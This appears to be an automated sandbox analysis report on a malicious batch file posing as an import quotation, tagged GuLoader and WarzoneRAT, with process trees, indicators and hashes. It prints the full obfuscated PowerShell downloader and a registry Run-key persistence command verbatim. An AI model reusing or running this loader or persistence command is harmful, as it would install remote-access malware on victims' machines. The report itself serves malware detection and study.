Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05/09/2024, 14:30
Static task
static1
Behavioral task
behavioral1
Sample
Final quarter Import request list quotation for _IMP1573_Rudra Industries_20240905.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Final quarter Import request list quotation for _IMP1573_Rudra Industries_20240905.bat
Resource
win10v2004-20240802-en
General
-
Target
Final quarter Import request list quotation for _IMP1573_Rudra Industries_20240905.bat
-
Size
3KB
-
MD5
a96683a18065602e77af0a6d01f0ce60
-
SHA1
3807eb2fc12a5f20d9f1729db85b9ff22d6d6eac
-
SHA256
9eabea1861473790bae6df91943268131241cf8b4f52bfefa659fb557541e8d8
-
SHA512
61a02fe1e4a01c7b8372402d9e56fbc6987de98c87631c201fa1f484972df4ed63e4a39ceee341478ebd0c9747d29ad053167a67f4899247048638a82c2b44ee
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 4720 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4720 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Doktorringens = "%Haandledet% -w 1 $bebyrdelsen=(Get-ItemProperty -Path 'HKCU:\\Intracity\\').Relateringen;%Haandledet% ($bebyrdelsen)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2536 wab.exe 2536 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2344 powershell.exe 2536 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2344 set thread context of 2536 2344 powershell.exe 100 -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4728 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 4720 powershell.exe 4720 powershell.exe 2344 powershell.exe 2344 powershell.exe 2344 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2344 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4720 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 380 wrote to memory of 4720 380 cmd.exe 84 PID 380 wrote to memory of 4720 380 cmd.exe 84 PID 4720 wrote to memory of 2616 4720 powershell.exe 87 PID 4720 wrote to memory of 2616 4720 powershell.exe 87 PID 4720 wrote to memory of 2344 4720 powershell.exe 95 PID 4720 wrote to memory of 2344 4720 powershell.exe 95 PID 4720 wrote to memory of 2344 4720 powershell.exe 95 PID 2344 wrote to memory of 1636 2344 powershell.exe 97 PID 2344 wrote to memory of 1636 2344 powershell.exe 97 PID 2344 wrote to memory of 1636 2344 powershell.exe 97 PID 2344 wrote to memory of 2536 2344 powershell.exe 100 PID 2344 wrote to memory of 2536 2344 powershell.exe 100 PID 2344 wrote to memory of 2536 2344 powershell.exe 100 PID 2344 wrote to memory of 2536 2344 powershell.exe 100 PID 2344 wrote to memory of 2536 2344 powershell.exe 100 PID 2536 wrote to memory of 4556 2536 wab.exe 102 PID 2536 wrote to memory of 4556 2536 wab.exe 102 PID 2536 wrote to memory of 4556 2536 wab.exe 102 PID 4556 wrote to memory of 4728 4556 cmd.exe 104 PID 4556 wrote to memory of 4728 4556 cmd.exe 104 PID 4556 wrote to memory of 4728 4556 cmd.exe 104
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Final quarter Import request list quotation for _IMP1573_Rudra Industries_20240905.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "If (${host}.Name) {$Epsilons++;$Assurancesummen+='subst';$Assurancesummen+='r';}$Assurancesummen+='ing';Function Summarizing($Sygehusenes){$Unitentacular=$Sygehusenes.Length-$Epsilons;For( $Realpolitikkens=2;$Realpolitikkens -lt $Unitentacular;$Realpolitikkens+=3){$Shaksheer+=$Sygehusenes.$Assurancesummen.'Invoke'( $Realpolitikkens, $Epsilons);}$Shaksheer;}function Rligstes($Mellitum){ . ($Marki) ($Mellitum);}$Nonappreciative=Summarizing 'AkM Mo ,zYei ,l AlAnaIs/F,5Fu.El0,s So(OsWAniArnEid,uo hwAtsNo SkNSmT,o fr1Et0Op.Fi0Te; B BlW .iUnnF.6Bi4 A; A J,x ,6Sa4Ko; P TrJave :L.1H,2,e1 O.Ti0 )Pe OvGCheL c k.eo ./Ve2.r0A.1un0Vi0Fo1Ud0G,1Zi lFdaiKor deFof.uo NxMa/Is1.c2A.1Kl.Sh0Ca ';$linjeringer=Summarizing ' aUFasAneP.r,a-TaABrgEye,anMotIn ';$Unmanducated224=Summarizing '.uh StC,tClpAisA :L./em/l.fL.iOplBue .s FhU.al,rFaeAlsTv.N op.rAng ./BacChs,rsB./.oB oe IsSekGimScmQueWadMgeSi.S lA z.ihNy ';$strintede=Summarizing ' i> P ';$Marki=Summarizing ',iiBreGrxRe ';$Junglegym='Mest';$Uheldigt = Summarizing ' .eVicMah.ioUn .%FoaMopSepB,dPoa ,tS aHe%Bl\PrCP,o Hl .o rWarD.hDraZap.oh.uy S. ,ULinUlw N T,&En& N ,ke ScFrhSpoBe TrtBr ';Rligstes (Summarizing 'Li$VigTilSpoS.bSpaColMo: ,LFoi GgLghAltC yBl=A.(anc,lmF,dH In/,acVr Li$ ,US,hBleMalEnd iFegPutSa)Uo ');Rligstes (Summarizing 'To$ .g.alMioj b a Tl m:DdU,dnA,iSut hi asUdaPft iS.o pn v=H.$,eURenJemC,a,tn TdteuG,cTia .t IeFadVi2Ko2Ga4Ca. As p FlPaiWetko( T$P.s tMyr,viKlnAntAfe dCre U) J ');Rligstes (Summarizing ' U[.yN AeSkt A..kS AeLurDevMiiGicRoe,ePGeo Fi hnB,t rMStaGanSka,ogUneDrrEp],o:Sm:MiSMieNucD.uFlr pibrt SyBrPthrSao ,tHyo ScDeoDalTi Ga= A Ko[ N oeHot.a.,lS,de Sc Hu MrMeiDut.my GPJ,rBooSutheo BcInoUolAnTFoyblpRaeEs]Mi: T:veT,ol Ls Z1Pa2Af ');$Unmanducated224=$Unitisation[0];$Gemmating= (Summarizing 'Ka$MigMilApo bN.aMrl .:AfBNaoCytR,tCeo.lmC,lAgaKnnRud .=reN,ke awS,-SiOOvbF.jSee,hc AtPo SySEfyTisLatPreSlmEx.O,NHoeA.tHe. VWRee ,bTiCInl Si.aeTinIrt');$Gemmating+=$Lighty[1];Rligstes ($Gemmating);Rligstes (Summarizing 'An$U,BStoMot,itProt m,ylTaaC nSad F.HaHSte ,a kd De urUnsCr[H.$Tal yi.anAbjDieStrGsiA n gTreKrrCr]Ud=,k$M,N ,oM.nFraMop,ipVerRie ,cJaiT,aPlt,hiMavFneW. ');$Rondache=Summarizing 's $ SBUnoS tAmthyo Mm.nlChaO,nAndD..EnDProBiwQun SlMootia Md DFbriunlGeeAu( ,$GrU VnEkmTia nA,dImu Kc ,aH,tuneSudFi2 .2M,4Ke,T $Ano,md ue,inD.s .eSbsMa)Rh ';$odenses=$Lighty[0];Rligstes (Summarizing ' C$ ,gFolOuoFlbBuaNolI,:DeA ,mBlaSirPry MlUdlKuiAfsBreTur I= C(UnTBreShsCatV -ZePUna it .hE, .p$ no dSpeRunV,sSke,ls O) ');while (!$Amarylliser) {Rligstes (Summarizing 'L.$ lgthlT,oStb PaUnl,v:FoN ao ,nConDiuE.l Tl SiMafRki lcSia St .i oS.nTi= S$Stt erUruseeSa ') ;Rligstes $Rondache;Rligstes (Summarizing ' ESGatLya Hr at F- NSTalLueBreGap r di4ca ');Rligstes (Summarizing ' .$L,g SlHiofib naAdlM.:unAKrmTha.ar ry .l cl CiO,sUneEkrRe=Ja( CTBeeKasTut i- BPOlagrtRghRe c$Reo FdSte KnvesMee FsHa)Ch ') ;Rligstes (Summarizing 'H,$StgEvlImo Gb ra DlPa:InPEgr KeKdr ,eFogTri Ms Otste.vrFa=Ha$Afg l ,oa,bdeaA l,u:OvTR rBeo.emKim oeTal sCa+ku+Kr% G$MaU On.ei rtS iRusTaaEvtReiAnoPrnUn. ncFuoO uStnAmtTo ') ;$Unmanducated224=$Unitisation[$Preregister];}$Reklameindtgter=317357;$Skalk=26107;Rligstes (Summarizing 'St$FogDelAlo ,bA a,el e:ObALacEnh,nr .o Rn CiBasS.mEx p.=Pr .GPhe btDo-DeCReo ,nFltRieBlnKetko Ha$FroCod PeS,n fsLee asGa ');Rligstes (Summarizing ',o$Dig.al .o DbFoaV lAb:S,SJia.rlGauM,e D S=Pr U[,vSBly.dsMutEgeSemSk.HoCGeoGin Dv aeDirRatTu]Na:fr:,rF nrQ oPemExBEkaThsE.e B6.c4BaSPet rB iF n ygGa(di$EfAanc vhFarS,oCin uiT sTem M)Un ');Rligstes (Summarizing 'S.$ rg.dl.loAwbSaa,il J:G,TTeoEngBarPreUmnS eBldF.eDysDi M.= , A.[ExSBlyL,s etOue rm i.,aT,reD,x,at.a. VE jnUpc SoredfoiAnn PgFr] I:In:ChAHeSReC UIWaIBr. MGOfeQutSuSKot,irP,iTonG g (,r$ .SPoaDel oucoeri)B ');Rligstes (Summarizing 'Fi$ ,g.al Po.pbsaaorl.l:CafSnoAmn idT,sP a ukLat,aiUleInnK.=Op$ oTFoo.cg LrD,eK.n BeOvdT,eFus F.eksMuuGlbInsMat Mr.siMon.ugPi(Fe$.hRNoeRek.nluna PmKoe,niHjnHedUut Ag tg.e drUn, ,$ aSD,kSqaG,l BkUd)Lu ');Rligstes $fondsaktien;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Colorrhaphy.Unw && echo t"3⤵PID:2616
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Epsilons++;$Assurancesummen+='subst';$Assurancesummen+='r';}$Assurancesummen+='ing';Function Summarizing($Sygehusenes){$Unitentacular=$Sygehusenes.Length-$Epsilons;For( $Realpolitikkens=2;$Realpolitikkens -lt $Unitentacular;$Realpolitikkens+=3){$Shaksheer+=$Sygehusenes.$Assurancesummen.'Invoke'( $Realpolitikkens, $Epsilons);}$Shaksheer;}function Rligstes($Mellitum){ . ($Marki) ($Mellitum);}$Nonappreciative=Summarizing 'AkM Mo ,zYei ,l AlAnaIs/F,5Fu.El0,s So(OsWAniArnEid,uo hwAtsNo SkNSmT,o fr1Et0Op.Fi0Te; B BlW .iUnnF.6Bi4 A; A J,x ,6Sa4Ko; P TrJave :L.1H,2,e1 O.Ti0 )Pe OvGCheL c k.eo ./Ve2.r0A.1un0Vi0Fo1Ud0G,1Zi lFdaiKor deFof.uo NxMa/Is1.c2A.1Kl.Sh0Ca ';$linjeringer=Summarizing ' aUFasAneP.r,a-TaABrgEye,anMotIn ';$Unmanducated224=Summarizing '.uh StC,tClpAisA :L./em/l.fL.iOplBue .s FhU.al,rFaeAlsTv.N op.rAng ./BacChs,rsB./.oB oe IsSekGimScmQueWadMgeSi.S lA z.ihNy ';$strintede=Summarizing ' i> P ';$Marki=Summarizing ',iiBreGrxRe ';$Junglegym='Mest';$Uheldigt = Summarizing ' .eVicMah.ioUn .%FoaMopSepB,dPoa ,tS aHe%Bl\PrCP,o Hl .o rWarD.hDraZap.oh.uy S. ,ULinUlw N T,&En& N ,ke ScFrhSpoBe TrtBr ';Rligstes (Summarizing 'Li$VigTilSpoS.bSpaColMo: ,LFoi GgLghAltC yBl=A.(anc,lmF,dH In/,acVr Li$ ,US,hBleMalEnd iFegPutSa)Uo ');Rligstes (Summarizing 'To$ .g.alMioj b a Tl m:DdU,dnA,iSut hi asUdaPft iS.o pn v=H.$,eURenJemC,a,tn TdteuG,cTia .t IeFadVi2Ko2Ga4Ca. As p FlPaiWetko( T$P.s tMyr,viKlnAntAfe dCre U) J ');Rligstes (Summarizing ' U[.yN AeSkt A..kS AeLurDevMiiGicRoe,ePGeo Fi hnB,t rMStaGanSka,ogUneDrrEp],o:Sm:MiSMieNucD.uFlr pibrt SyBrPthrSao ,tHyo ScDeoDalTi Ga= A Ko[ N oeHot.a.,lS,de Sc Hu MrMeiDut.my GPJ,rBooSutheo BcInoUolAnTFoyblpRaeEs]Mi: T:veT,ol Ls Z1Pa2Af ');$Unmanducated224=$Unitisation[0];$Gemmating= (Summarizing 'Ka$MigMilApo bN.aMrl .:AfBNaoCytR,tCeo.lmC,lAgaKnnRud .=reN,ke awS,-SiOOvbF.jSee,hc AtPo SySEfyTisLatPreSlmEx.O,NHoeA.tHe. VWRee ,bTiCInl Si.aeTinIrt');$Gemmating+=$Lighty[1];Rligstes ($Gemmating);Rligstes (Summarizing 'An$U,BStoMot,itProt m,ylTaaC nSad F.HaHSte ,a kd De urUnsCr[H.$Tal yi.anAbjDieStrGsiA n gTreKrrCr]Ud=,k$M,N ,oM.nFraMop,ipVerRie ,cJaiT,aPlt,hiMavFneW. ');$Rondache=Summarizing 's $ SBUnoS tAmthyo Mm.nlChaO,nAndD..EnDProBiwQun SlMootia Md DFbriunlGeeAu( ,$GrU VnEkmTia nA,dImu Kc ,aH,tuneSudFi2 .2M,4Ke,T $Ano,md ue,inD.s .eSbsMa)Rh ';$odenses=$Lighty[0];Rligstes (Summarizing ' C$ ,gFolOuoFlbBuaNolI,:DeA ,mBlaSirPry MlUdlKuiAfsBreTur I= C(UnTBreShsCatV -ZePUna it .hE, .p$ no dSpeRunV,sSke,ls O) ');while (!$Amarylliser) {Rligstes (Summarizing 'L.$ lgthlT,oStb PaUnl,v:FoN ao ,nConDiuE.l Tl SiMafRki lcSia St .i oS.nTi= S$Stt erUruseeSa ') ;Rligstes $Rondache;Rligstes (Summarizing ' ESGatLya Hr at F- NSTalLueBreGap r di4ca ');Rligstes (Summarizing ' .$L,g SlHiofib naAdlM.:unAKrmTha.ar ry .l cl CiO,sUneEkrRe=Ja( CTBeeKasTut i- BPOlagrtRghRe c$Reo FdSte KnvesMee FsHa)Ch ') ;Rligstes (Summarizing 'H,$StgEvlImo Gb ra DlPa:InPEgr KeKdr ,eFogTri Ms Otste.vrFa=Ha$Afg l ,oa,bdeaA l,u:OvTR rBeo.emKim oeTal sCa+ku+Kr% G$MaU On.ei rtS iRusTaaEvtReiAnoPrnUn. ncFuoO uStnAmtTo ') ;$Unmanducated224=$Unitisation[$Preregister];}$Reklameindtgter=317357;$Skalk=26107;Rligstes (Summarizing 'St$FogDelAlo ,bA a,el e:ObALacEnh,nr .o Rn CiBasS.mEx p.=Pr .GPhe btDo-DeCReo ,nFltRieBlnKetko Ha$FroCod PeS,n fsLee asGa ');Rligstes (Summarizing ',o$Dig.al .o DbFoaV lAb:S,SJia.rlGauM,e D S=Pr U[,vSBly.dsMutEgeSemSk.HoCGeoGin Dv aeDirRatTu]Na:fr:,rF nrQ oPemExBEkaThsE.e B6.c4BaSPet rB iF n ygGa(di$EfAanc vhFarS,oCin uiT sTem M)Un ');Rligstes (Summarizing 'S.$ rg.dl.loAwbSaa,il J:G,TTeoEngBarPreUmnS eBldF.eDysDi M.= , A.[ExSBlyL,s etOue rm i.,aT,reD,x,at.a. VE jnUpc SoredfoiAnn PgFr] I:In:ChAHeSReC UIWaIBr. MGOfeQutSuSKot,irP,iTonG g (,r$ .SPoaDel oucoeri)B ');Rligstes (Summarizing 'Fi$ ,g.al Po.pbsaaorl.l:CafSnoAmn idT,sP a ukLat,aiUleInnK.=Op$ oTFoo.cg LrD,eK.n BeOvdT,eFus F.eksMuuGlbInsMat Mr.siMon.ugPi(Fe$.hRNoeRek.nluna PmKoe,niHjnHedUut Ag tg.e drUn, ,$ aSD,kSqaG,l BkUd)Lu ');Rligstes $fondsaktien;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Colorrhaphy.Unw && echo t"4⤵
- System Location Discovery: System Language Discovery
PID:1636
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Doktorringens" /t REG_EXPAND_SZ /d "%Haandledet% -w 1 $bebyrdelsen=(Get-ItemProperty -Path 'HKCU:\Intracity\').Relateringen;%Haandledet% ($bebyrdelsen)"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Doktorringens" /t REG_EXPAND_SZ /d "%Haandledet% -w 1 $bebyrdelsen=(Get-ItemProperty -Path 'HKCU:\Intracity\').Relateringen;%Haandledet% ($bebyrdelsen)"6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4728
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
447KB
MD579595b573db61bc70ebee0b1908c2f7b
SHA146dd9a6726f98981c5f02b449d5c9395d6ee6459
SHA256dd80984463126238eb42b0da44258eb2d5452e54fe6b2500e230d225a54973fd
SHA512b96ebee4fba29a82965e60166b717b1ddc0f7a84cde954b0ccabf534816d57a5d7ec82105863dcb7aa8dc92cb4607b92fde5d526fcbf7350140c3becfea6d3f0